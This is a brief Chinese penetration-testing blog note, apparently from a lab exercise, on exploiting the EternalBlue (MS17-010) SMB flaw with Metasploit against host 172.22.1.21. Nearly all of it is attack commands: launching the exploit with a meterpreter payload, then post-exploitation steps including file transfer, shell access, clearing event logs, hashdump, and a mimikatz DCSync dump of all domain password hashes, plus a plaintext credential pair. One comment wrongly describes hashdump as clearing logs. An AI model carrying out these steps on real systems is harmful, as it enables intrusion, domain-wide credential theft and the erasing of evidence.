永恒之蓝

永恒之蓝的打法

msf

17010

1
2
3
4
5
proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue # 选择使用的模块
set payload windows/x64/meterpreter/bind_tcp_uuid # 设置payload,可以通过show payloads查看
set RHOSTS 172.22.1.21 # 设置靶机的ip
exploit # 发起攻击

攻击成功之后

1
2
3
4
5
6
meterpreter > screenshot # 捕获屏幕
meterpreter > upload hello.txt c:// #上传文件
meterpreter > download d://1.txt # 下载文件
meterpreter > shell # 获取cmd
meterpreter > clearev # 清除日志
meterpreter > hashdump # 清除日志
1
2
load kiwi  # 调用mimikatz模块
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit # 导出域内所有用户的信息(包括哈希值)

方程式工具

直接注入dll,然后rdp登录

1
admin01/Config123!@#

永恒之蓝
http://fearless-123.github.io/2025/09/24/渗透/永恒之蓝/
作者
fearless123
发布于
2025年9月24日
许可协议